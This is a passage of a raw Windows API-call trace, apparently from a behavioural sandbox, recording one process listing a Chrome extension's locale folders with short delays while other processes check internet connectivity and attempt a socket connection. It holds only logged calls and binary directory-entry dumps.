FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:25,691 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:25,751 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,751 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x8c\xack\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01\x90\x8c\xack\xe0\x91\xcf\x01\x90\x8c\xack\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x8c\xack\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01=\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,751 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,751 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,832 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\hr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,832 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x13\xaek\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xc0\x13\xaek\xe0\x91\xcf\x01\xc0\x13\xaek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x13\xaek\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01D\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,832 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,832 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:25,912 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:25,912 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x13\xaek\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xc0\x13\xaek\xe0\x91\xcf\x01\xc0\x13\xaek\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x13\xaek\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01D\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:25,912 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:25,912 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,092 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\id\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9a\xafk\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xf0\x9a\xafk\xe0\x91\xcf\x01\xf0\x9a\xafk\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9a\xafk\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01?\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,102 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,182 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\it\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,182 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9a\xafk\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01 "\xb1k\xe0\x91\xcf\x01 "\xb1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 "\xb1k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01@\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,182 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,182 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,262 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ja\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,262 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00 "\xb1k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01 "\xb1k\xe0\x91\xcf\x01 "\xb1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 "\xb1k\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x010d\xdak\xe0\x91\xcf\x01K\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,262 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,262 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,342 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ko\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,342 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xa9\xb2k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01P\xa9\xb2k\xe0\x91\xcf\x01P\xa9\xb2k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\xa9\xb2k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01I\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,342 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,342 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,422 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\lt\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,422 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xa9\xb2k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\x800\xb4k\xe0\x91\xcf\x01\x800\xb4k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x800\xb4k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01M\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,422 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,422 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,493 | 364 | connect |
socket => 0x000001c4 |
FAILURE | 4294967295 | |
| 07:44:26,493 | 364 | closesocket |
socket => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 07:44:26,493 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:26,493 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:26,493 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:26,503 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:26,503 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:26,503 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\lv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,503 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x800\xb4k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\x800\xb4k\xe0\x91\xcf\x01\x800\xb4k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x800\xb4k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01H\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,503 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,513 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,593 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\nl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,593 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xb7\xb5k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xb0\xb7\xb5k\xe0\x91\xcf\x01\xb0\xb7\xb5k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb7\xb5k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01C\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,593 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,593 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,673 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\no\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,673 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xb7\xb5k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xb0\xb7\xb5k\xe0\x91\xcf\x01\xb0\xb7\xb5k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb7\xb5k\xe0\x91\xcf\x01~0\xb6k\xe0\x91\xcf\x01\x00y`V\x89+\xce\x01\xb0\xb7\xb5k\xe0\x91\xcf\x01,\x01\x00\x00\x00\x00\x00\x000\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,673 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,673 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,753 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\pl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,753 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0>\xb7k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xe0>\xb7k\xe0\x91\xcf\x01\xe0>\xb7k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0>\xb7k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01H\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,753 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,753 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,833 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\pt_BR\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,833 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0>\xb7k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\xe0>\xb7k\xe0\x91\xcf\x01\xe0>\xb7k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0>\xb7k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01H\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,843 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,843 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:26,923 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\pt_PT\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:26,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0>\xb7k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\x10\xc6\xb8k\xe0\x91\xcf\x01\x10\xc6\xb8k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xc6\xb8k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01G\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:26,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:26,923 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,003 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ro\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:27,003 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xc6\xb8k\xe0\x91\xcf\x01\x80\xa3\xcck\xe0\x91\xcf\x01\x10\xc6\xb8k\xe0\x91\xcf\x01\x10\xc6\xb8k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xc6\xb8k\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01`\xeb\xdbk\xe0\x91\xcf\x01D\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:27,003 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:27,003 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:27,083 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ru\*.* |
SUCCESS | 0x001734c0 | |
